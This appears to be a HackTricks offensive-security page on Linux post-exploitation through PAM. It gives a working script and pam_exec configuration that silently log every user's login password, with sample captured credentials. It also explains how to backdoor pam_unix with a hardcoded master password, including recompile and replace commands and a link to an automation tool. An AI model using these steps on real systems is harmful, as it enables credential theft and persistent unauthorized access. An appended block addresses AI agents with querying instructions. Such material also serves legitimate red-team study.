# Linux Post-Exploitation

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Sniffing Logon Passwords with PAM

Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:

{% content-ref url="/pages/e1BTDdVfds6hYR8I2DKD" %}
[PAM - Pluggable Authentication Modules](/dashboard/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)
{% endcontent-ref %}

First, we create a bash script that will be invoked whenever a new authentication occurs.

```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
```

The variables are PAM specific and will become available via the `pam_exec.so` module.

Here is the meaning of the variables:

* **$PAM\_USER:** The username that was entered.
* **$PAM\_RHOST:** The remote host (typically the IP Address)
* **$(cat -):** This reads `stdin`, and will contain the password that the script grabs
* The results are piped into a log file at `/var/log/toomanysecrets.log`

To **prevent all users from reading** the file consider pre-creating it and running `chmod`, e.g.:

```bash
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
```

Next, the PAM configuration file needs to be updated the `pam_exec` module will be used to invoke the script.

There are various config files located in `/etc/pam.d/`, and we pick `common-auth`.

```
sudo nano /etc/pam.d/common-auth
```

On the very bottom of the file, add the following authentication module:

`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`

The options have the following meaning:

* **optional:** Authenticaiton shouldn’t fail if there is an error (it’s not a required step)
* **pam\_exec.so:** This is the living off the land PAM module that can invoke arbitrary scripts
* **expose\_authtok:** This is the trick that allows to read the password via `stdin`
* **quiet:** Don’t show any errors to the user (if something doesn’t work)
* The last argument is the shell script that was created previously

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(375\).png)

Finally, make the file executable:

`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`

Now, let’s try this out and ssh from another machine, or login locally.

And then look at the log file:

```
$ sudo cat /var/log/toomanysecrets.log
 Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
 Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
 Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
```

### Backdooring PAM

Let go to the sources of PAM (depends on your distro, take the same version number as yours..) and look around line numbers 170/180 in the pam\_unix\_auth.c file:

```
vi modules/pam_unix/pam_unix_auth.c
```

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(651\).png)

Let’s change this by:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(638\)%20\(2\)%20\(2\).png)

This will allow any user using the **password "0xMitsurugi"** to log in.

Recompile the `pam_unix_auth.c`, and replace the pam\_unix.so file:

```bash
make
sudo cp \  
  /home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \  
  /lib/x86_64-linux-gnu/security/  
```

{% hint style="info" %}
You can automate this process with <https://github.com/zephrax/linux-pam-backdoor>
{% endhint %}

## References

* <https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/>
* <https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9>

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://breached.gitbook.io/dashboard/linux-hardening/linux-post-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.